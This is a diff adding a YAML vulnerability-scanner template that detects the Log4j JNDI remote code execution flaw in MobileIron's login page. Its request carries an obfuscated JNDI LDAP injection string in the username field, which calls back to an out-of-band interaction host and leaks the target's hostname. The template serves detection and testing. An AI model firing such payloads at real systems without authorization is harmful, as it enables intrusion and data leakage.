diff --git a/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml new file mode 100644 index 0000000000..70849704af --- /dev/null +++ b/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -0,0 +1,41 @@ +id: mobileiron-log4j-jndi-rce + +info: + name: MobileIron Log4J JNDI RCE + author: meme-lord + severity: high + description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + reference: + - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q + - https://www.lunasec.io/docs/blog/log4j-zero-day/ + - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a + - https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads/blob/main/MobileIron + tags: rce,jndi,oast,log4j,mobileiron + +requests: + - raw: + - | + POST /mifs/j_spring_security_check HTTP/1.1 + Referer: {{RootURL}}/mifs/user/login.jsp + Content-Type: application/x-www-form-urlencoded + + j_username=${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file